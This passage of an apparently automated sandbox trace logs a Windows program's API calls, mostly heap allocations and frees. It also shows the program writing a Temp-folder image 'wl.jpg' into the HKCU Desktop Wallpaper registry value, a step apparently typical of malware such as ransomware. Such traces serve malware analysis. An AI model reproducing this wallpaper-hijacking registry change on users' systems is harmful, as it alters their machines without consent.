lpsz="TEMPDIR") returned 0x7 [0305.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0305.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0305.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0305.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0305.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0305.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0305.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0305.688] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0305.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0305.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0305.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0305.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0305.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0305.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0305.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0305.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0305.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0305.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0305.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0305.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0305.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0305.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0305.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0305.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0305.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0305.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0305.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0305.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0305.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0305.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0305.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0305.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0305.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0305.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0305.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0305.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0305.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0305.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0305.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0305.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0305.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0305.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0305.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0305.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0305.695] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0305.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0305.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0305.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0305.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0305.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0305.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0305.695] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0305.696] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0305.696] RegCloseKey (hKey=0x294) returned 0x0 [0305.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0305.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0305.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0305.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0305.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0305.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0305.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0305.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0305.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0305.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0305.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0305.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0305.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0305.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0305.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0305.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0305.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0305.699] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0305.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0305.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0305.699] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0305.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0305.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0305.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0305.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0305.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0305.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0305.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0305.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0305.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0305.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0305.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0305.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0305.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0305.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0305.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0305.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0305.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0305.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0305.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0305.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0305.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0305.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0305.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0305.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0305.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0305.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0305.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0305.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0305.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0305.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0305.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0305.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0305.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0305.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0305.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0305.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0305.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0305.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0305.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0305.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0305.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0305.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0305.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0305.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0305.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0305.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0305.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0305.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0305.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0305.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0305.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0305.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0305.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0305.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0305.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0305.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0305.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0305.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0305.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0305.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0305.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0305.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0305.706] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0305.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0305.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0305.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0305.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0305.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0305.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0305.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0305.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0305.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0305.708] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0305.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0305.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0305.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0305.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0305.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0305.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0305.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0305.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0305.710] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0305.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0305.710] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0305.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0305.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0305.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0305.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0305.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0305.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0305.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0305.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0305.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0305.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0305.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0305.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0305.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0305.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0305.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0305.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0305.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0305.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0305.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0305.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0305.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0305.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0305.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0305.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0305.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0305.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0305.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0305.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0305.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0305.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0305.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0305.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0305.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0305.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0305.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0305.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0305.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0305.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0305.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0305.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0305.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0305.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0305.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0305.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0305.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0305.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0305.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0305.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0305.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0305.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0305.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0305.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0305.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0305.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0305.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0305.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0305.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0305.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0305.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0305.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0305.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0305.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0305.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0305.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0305.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0305.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0305.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0305.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0305.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0305.719] 